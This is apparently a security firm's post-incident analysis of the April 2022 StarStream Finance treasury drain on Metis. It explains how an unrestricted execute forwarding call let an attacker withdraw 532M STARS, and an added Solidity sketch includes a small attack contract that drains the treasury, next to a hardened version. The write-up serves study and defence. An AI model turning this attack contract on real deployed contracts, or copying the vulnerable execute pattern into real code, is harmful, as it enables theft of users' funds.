On April 8, 2022, according to Beosin-Alert, StarStream Finance's DistributorTreasury contract was exploited for about 532M $STARS, which the hacker then swapped for roughly 900 ETH. The Beosin security team analyzed the incident; the results are as follows:
Starstream is a suite of products providing yield aggregation, yield generation and one-click smart contracts on the Metis L2 rollup. The protocol is maintained by various developers and governed by STARS holders.

● Transaction hash:
0xb1795ca2e77954007af14d89814c83b2d4f05d1834948f304fd9d731db875435
● Exploiter’s address:
0xffd90c77eaba8c9f24580a2e0088c0c940ac9c48
● Contract that launched the attack:
0x75381c1f12733fff9976525db747ef525646677d
● Attacked contract:
0x6f99b960450662d67bA7DCf78ac959dBF9050725
1. The project party (0x000007…d653cd) created the StarstreamTreasury (0x1075da…0c90e9) and DistributorTreasury (0x6f99b9…050725) contracts and transferred ownership of StarstreamTreasury to DistributorTreasury.

2. The attacker exploited the unsafe low-level call in the execute function of the DistributorTreasury contract, which forwards arbitrary calls to any external address. Because DistributorTreasury is the owner of StarstreamTreasury, a call routed through it satisfies the treasury's owner check, so the attacker used execute to invoke withdrawTokens on StarstreamTreasury and withdrew a total of 532,571,155.859 $STARS from the contract.


The root cause of this vulnerability is that DistributorTreasury exposes an unrestricted low-level call: execute neither checks who is calling it nor constrains the target or calldata, so an attacker can make the contract perform arbitrary function calls with the contract's own privileges.
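To make the failure mode concrete, below is an added Solidity sketch of the pattern described above; it is not the deployed StarStream code and not the bytecode Beosin analysed. The contract and function names (DistributorTreasury, StarstreamTreasury, execute, withdrawTokens) are taken from this write-up; every signature, parameter, body and the hardened variant are assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Added illustration, not the deployed StarStream code. Contract and function
// names (DistributorTreasury, StarstreamTreasury, execute, withdrawTokens) come
// from the write-up; every signature, body and the hardened variant are assumed.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

// The treasury itself is gated correctly: only its owner may withdraw.
contract StarstreamTreasury {
    address public owner;

    constructor(address initialOwner) {
        owner = initialOwner;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function transferOwnership(address newOwner) external onlyOwner {
        owner = newOwner;
    }

    function withdrawTokens(address token, address to, uint256 amount) external onlyOwner {
        require(IERC20(token).transfer(to, amount), "transfer failed");
    }
}

// Vulnerable pattern: anyone can make this contract call anything.
// Once it owns StarstreamTreasury, the treasury's owner privileges are public.
contract VulnerableDistributorTreasury {
    function execute(address target, bytes calldata data) external returns (bytes memory) {
        (bool ok, bytes memory ret) = target.call(data);
        require(ok, "call failed");
        return ret;
    }
}

// Attack contract: asks the distributor to call withdrawTokens on its behalf.
// Inside the treasury msg.sender == distributor, so onlyOwner passes.
contract DrainViaExecute {
    function drain(address distributor, address treasury, address token, uint256 amount) external {
        bytes memory data = abi.encodeWithSelector(
            StarstreamTreasury.withdrawTokens.selector, token, msg.sender, amount
        );
        VulnerableDistributorTreasury(distributor).execute(treasury, data);
    }
}

// Hardened pattern: the forwarding call is owner-only and the target is allowlisted,
// so neither the caller nor the destination is attacker-controlled.
contract HardenedDistributorTreasury {
    address public owner;
    mapping(address => bool) public allowedTarget;

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function setAllowedTarget(address target, bool allowed) external onlyOwner {
        allowedTarget[target] = allowed;
    }

    function execute(address target, bytes calldata data) external onlyOwner returns (bytes memory) {
        require(allowedTarget[target], "target not allowed");
        (bool ok, bytes memory ret) = target.call(data);
        require(ok, "call failed");
        return ret;
    }
}
```

In a local Foundry or Hardhat test one would deploy the treasury with its owner set to VulnerableDistributorTreasury, fund it with a mock ERC-20, and call drain from an unprivileged account: the tokens leave the treasury, because the treasury's own check only sees the distributor as caller. Repeating the same call against HardenedDistributorTreasury reverts with "not owner". The general lesson is that a contract holding privileges over another must treat any call-forwarding function as part of its trusted surface: gate the caller, and constrain the target (and ideally the selector) to what the distributor legitimately needs.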
The current flow of funds is shown below:

In response to this incident, the Beosin security team recommends:
Smart contract developers should pay attention to permission control when designing and implementing key operations; in particular, a function that forwards calls on a contract's behalf must be restricted to trusted callers and targets, since it carries every privilege the contract holds elsewhere.
Before a project goes live, it is highly recommended to conduct a professional contract security audit to avoid security risks. Beosin can provide professional security audit services. For more details, please visit our official website or contact us via Twitter, Discord or Telegram.
Contact Us
Website: https://beosin.com/
Email: contact@beosin.com
Twitter: https://twitter.com/Beosin_com
Telegram: https://t.me/beosin
Medium: https://medium.com/@Beosin